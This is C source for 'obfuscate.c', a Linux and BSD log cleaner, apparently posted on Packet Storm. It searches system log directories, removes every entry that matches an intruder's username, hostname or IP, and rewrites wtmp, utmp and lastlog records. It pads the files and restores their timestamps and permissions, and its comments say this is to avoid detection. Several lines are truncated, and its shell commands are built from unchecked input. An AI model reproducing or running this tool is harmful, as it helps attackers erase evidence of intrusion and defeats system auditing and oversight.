Obfuscate.c is a linux and bsd log file cleaner.
939125b06fc9ffd36abf2f322e147c4a8138b429d68b588fb867a4b77f4a0afe/* obfuscate.c by intrusive -(intrusive@portalofevil.com)- */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <limits.h>
#include <unistd.h>
#include <time.h>
#include <utime.h>
#include <fcntl.h>
#include <utmp.h>
/*#include <lastlog.h>*/
#include <pwd.h>
struct lastl
{
char lhost[UT_HOSTSIZE];
char lline[UT_LINESIZE];
time_t ltime;
} newl;
void edit_logs(FILE *fptr, char *uname, char *hname, char *ip, int
*flag);
void edit_tmp(char *uname, char *fname, int *flag);
void edit_lastlog(char *uname, char *fname, int *flag);
FILE * find_logs(void);
void wronguse(char *binname)
{
fprintf(stderr, "usage: %s [-x] <username> <hostname> <ip>\n",
binname);
fprintf(stderr, "-x: clears all user's entries from
wtmp/utmp/lastlog.\n(otherwise only most recent entry will be
cleared)\n\n");
fprintf(stderr, "obfuscate v1.1\n\n");
exit(1);
}
int main(int argc, char **argv)
{
FILE *fptr;
char hostname[UT_HOSTSIZE];
char ip[UT_HOSTSIZE];
char username[UT_NAMESIZE];
int flag;
if(argc < 4 || argc > 5)
{
printf("\nwrong argument number\n\n");
wronguse(argv[0]);
}
if(argc == 5)
{
if(!strcmp(argv[1], "-x"))
{
strcpy(username, argv[2]);
strcpy(hostname, argv[3]);
strcpy(ip, argv[4]);
flag = 1;
}
else
{
printf("\nbad syntax\n\n");
wronguse(argv[0]);
}
}
else
{
strcpy(username, argv[1]);
strcpy(hostname, argv[2]);
strcpy(ip, argv[3]);
flag = 0;
}
if(!(fptr = fopen("logfiles.txt", "r"))) /* find the log files
if you haven't already */
{
if(!(fptr = find_logs()))
{
fprintf(stderr, "problem with logfiles\n");
exit(1);
}
}
edit_logs(fptr, username, hostname, ip, &flag);
fclose(fptr);
/*system("rm logfiles.txt");*/ /* comment this out if you want
don't want to find the logs again on every run */
printf("\nHoly shit, where'd i go?!\n");
return 0;
}
FILE * find_logs(void){
FILE *fptr, *fptr2;
int x, y, z;
char *c;
char cmd[160];
char *logfiles[] = { "*log*", "*wtmp*", "*utmp*", "*messages*",
"*fail*", "*error*", "*secure*" };
char *filter[] = { "jpg", "gif", "jpeg", "conf", ".o", "gz",
"tar", "JPG", "GIF", "JPEG", "BMP", "bmp", ".c", ".h", ".lo",
".pid", ".login", $
char *find_dirs[] = { "/var/log", "/var/run", "/root/", "/etc/" };
/* edit find_dirs as needed (this can significantly speed up
the scan)$
char strholder[PATH_MAX];
char laststr[PATH_MAX];
char vartmpstr[PATH_MAX];
if(system("touch test.txt") != 0) /* check if you have
proper permissions in cwd */
{
fprintf(stderr, "you need read/write permission to your
current working dir.\n");
exit(1);
}
system("rm test.txt");
for(y=0; y < 4; y++) /* don't forget to change this if
you changed find_dirs */
{
for(x = 0; x < 7; x++)
{
sprintf(cmd, "find %s -name \"%s\" >> tmpfile",
find_dirs[y], logfiles[x]);
system(cmd);
}
}
if(!(fptr = fopen("tmpfile", "r")))
{
fprintf(stderr, "error opening logfile list\n");
exit(1);
}
if(!(fptr2 = fopen("logfiles.txt", "w+"))) {
fprintf(stderr, "error opening logfile list\n");
exit(1);
}
/* try to get rid of misc files that shouldn't be checked or might
be harmed by the filtering process...
you will probably want to edit logfiles.txt by hand too, to
elimate unnecessary resource consumption. This can be
especially useful on slower machines and can help avoid detection */
while(fgets(strholder, PATH_MAX, fptr))
{
/* make sure lastlog is the last thing on the list so that wtmp
will be opened before
it and the previous login time can be preserved */
if(strstr(strholder, "/lastlog") && !(strstr(strholder,
"/lastlog.")))
{
strncpy(laststr, strholder, strlen(strholder));
continue;
}
#if defined (__linux__)
if(strstr(strholder, "/wtmp") && !(strstr(strholder,
"/wtmp."))) /* make sure wtmp.* is before wtmp so it doesn't
corrupt login time$
{
strncpy(vartmpstr, strholder, strlen(strholder));
continue;
}
#elif defined (__OpenBSD__) || defined (__FreeBSD__) || defined
(__NetBSD__)
if(strstr(strholder, "/utmp") && !(strstr(strholder,
"/utmp."))) /* make sure utmp.* is before utmp so it doesn't
corrupt login time$
{
strncpy(vartmpstr, strholder, strlen(strholder));
continue;
}
#endif
for(x = 0; x < 17; x++)
{
z = 0;
if(strstr(strholder, filter[x]))
{
z++;
if(strstr(strholder, ".log"))
if(!(strstr(strholder, ".logout")) ||
!(strstr(strholder, ".login")))
{
fputs(strholder, fptr2);
break;
}
}
}
if(z > 0)
continue;
fputs(strholder, fptr2);
}
fputs(vartmpstr, fptr2);
fputs(laststr, fptr2);
fclose(fptr);
return fptr2;
}
void edit_logs(FILE *fptr, char *uname, char *hname, char *ip, int
*flag)
{
FILE *sfile, *dfile;
struct stat filebuff, tmpbuff;
struct utimbuf timebuff;
int x;
off_t sizedif;
mode_t fmode;
uid_t fuid;
gid_t fgid;
char cmd[PATH_MAX];
char fname[PATH_MAX];
char strholder[4096];
char *y;
rewind(fptr);
while(fgets(fname, PATH_MAX, fptr))
{
if(y = strchr(fname, '\n'))
*y = '\0';
if(stat(fname, &filebuff) == -1)
{
fprintf(stderr, "%s doesn't exist\n\n", fname);
continue;
}
timebuff.actime = filebuff.st_atime;
timebuff.modtime = filebuff.st_mtime;
fmode = filebuff.st_mode;
fuid = filebuff.st_uid;
fgid = filebuff.st_gid;
if(strstr(fname, "wtmp") || strstr(fname, "utmp"))
{
edit_tmp(uname, fname, flag);
chown(fname, fuid, fgid);
chmod(fname, fmode);
utime(fname, &timebuff);
continue;
}
if(strstr(fname, "lastlog"))
{
edit_lastlog(uname, fname, flag);
chown(fname, fuid, fgid);
chmod(fname, fmode);
utime(fname, &timebuff);
continue;
}
if(S_ISDIR(filebuff.st_mode))
{
fprintf(stderr, "%s is a directory\n\n", fname);
continue;
}
printf("checking %s...\n", fname);
if(!(sfile = fopen(fname, "r+")))
{
fprintf(stderr, "error opening/reading/writing file,
check permissions for it or make sure you're root\n\n");
continue;
}
while(fgets(strholder, 4096, sfile))
{
if(y = strchr(strholder, '\n'))
*y = '\0';
if(strstr(strholder, uname) || strstr(strholder,
hname) || strstr(strholder, ip))
{
printf("traces found in %s\ntaking care of
that...\n", fname);
fclose(sfile);
sprintf(cmd, "grep -v %s %s | grep -v %s | grep
-v %s > tmpfile", uname, fname, hname, ip);
system(cmd);
stat("tmpfile", &tmpbuff);
if(tmpbuff.st_size < filebuff.st_size)
{
if((dfile = fopen("tmpfile", "a+b")))
{
sizedif = (filebuff.st_size -
tmpbuff.st_size);
fseek(fptr, 0, SEEK_END);
for(x = 0; x < sizedif; sizedif--)
fputc(' ', dfile);
}
}
fclose(dfile);
sprintf(cmd, "mv tmpfile %s", fname); /* replace
original file */
system(cmd);
utime(fname, &timebuff);
chown("tmpfile", fuid, fgid); /* restore
original ownership & permissions */
chmod("tmpfile", fmode);
printf("%s now clear\n\n", fname);
break;
}
}
printf("%s clear\n\n", fname);
continue;
}
fclose(fptr);
}
void edit_tmp(char *uname, char *fname, int *flag)
{
FILE *fptr, *fptr2;
struct utmp utmpstruct;
struct stat filebuff, tmpbuff;
char cmd[PATH_MAX];
long int rv, rv2;
int x, y;
y = 0;
if(stat(fname, &filebuff) == -1)
{
fprintf(stderr, "error getting stats for %s. maker sure you
have proper perms\n\n", fname);
return;
}
if(!(fptr = fopen(fname, "r+")))
{
fprintf(stderr, "error reading %s\n\n", fname);
return;
}
printf("editting %s now...\n", fname);
if(!(fptr2 = fopen("tmptmp", "w+")))
{
fprintf(stderr, "error modifying %s\n\n", fname);
return;
}
if(*flag == 1)
{
while(fread(&utmpstruct, sizeof(struct utmp), 1, fptr))
{
if(strncmp(utmpstruct.ut_name, uname, strlen(uname)))
fwrite(&utmpstruct, sizeof(struct utmp), 1, fptr2);
}
}
else
{
while(fread(&utmpstruct, sizeof(struct utmp), 1, fptr))
if(!strncmp(utmpstruct.ut_name, uname, strlen(uname)))
{
rv2 = rv;
rv = (ftell(fptr) - sizeof(struct utmp));
}
rewind(fptr);
while(fread(&utmpstruct, sizeof(struct utmp), 1, fptr))
{
if(ftell(fptr) < rv)
fwrite(&utmpstruct, sizeof(struct utmp), 1, fptr2);
if(ftell(fptr) == rv2)
{
strncpy(newl.lhost, utmpstruct.ut_host,
sizeof(utmpstruct.ut_host));
strncpy(newl.lline, utmpstruct.ut_line,
sizeof(utmpstruct.ut_line));
newl.ltime = utmpstruct.ut_time;
fwrite(&utmpstruct, sizeof(struct utmp), 1, fptr2);
}
if(strncmp(utmpstruct.ut_name, uname, strlen(uname)))
fwrite(&utmpstruct, sizeof(struct utmp), 1, fptr2);
}
}
if(stat("tmptmp", &tmpbuff) == -1)
{
fprintf(stderr, "problem stat'ing replacement file\n\n");
return;
}
if(tmpbuff.st_size < filebuff.st_size)
{
x = 0;
memset((char *)&utmpstruct, 0, sizeof(struct utmp));
while(x < ((filebuff.st_size - tmpbuff.st_size) /
sizeof(struct utmp)))
{
fwrite(&utmpstruct, sizeof(struct utmp), 1, fptr2);
x++;
}
}
fclose(fptr);
fclose(fptr2);
sprintf(cmd, "mv tmptmp %s", fname);
system(cmd);
printf("%s is now clear\n\n", fname);
return;
}
void edit_lastlog(char *uname, char *fname, int *flag)
{
FILE *fptr;
struct lastlog laststruct;
struct passwd *pass;
printf("cleaning lastlog...\n");
if(!(fptr = fopen(fname, "r+")))
{
fprintf(stderr, "error opening %s. is it even there?\n\n",
fname);
exit(1);
}
if((pass = getpwnam(uname)) != NULL)
{
if(*flag == 0)
{
fseek(fptr, sizeof(struct lastlog)*pass->pw_uid,
SEEK_SET);
fread(&laststruct, sizeof(struct lastlog), 1, fptr);
laststruct.ll_time = newl.ltime;
strncpy(laststruct.ll_host, newl.lhost,
sizeof(newl.lhost));
strncpy(laststruct.ll_line, newl.lline,
sizeof(newl.lline));
}
else
{
fseek(fptr, sizeof(struct lastlog)*pass -> pw_uid,
SEEK_SET);
fread(&laststruct, sizeof(struct lastlog), 1, fptr);
laststruct.ll_time = 0;
memset(&laststruct.ll_line, 0,
sizeof(laststruct.ll_line));
memset(&laststruct.ll_host, 0,
sizeof(laststruct.ll_host));
}
}
fseek(fptr, sizeof(struct lastlog)*pass -> pw_uid, SEEK_SET);
fwrite(&laststruct, sizeof(struct lastlog), 1, fptr);
fclose(fptr);
printf("%s should be clean..\n", fname);
return;
}
________________________________________________________________
Get your own portalofevil.com address at http://www.evilemail.com
http://www.portalofevil.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed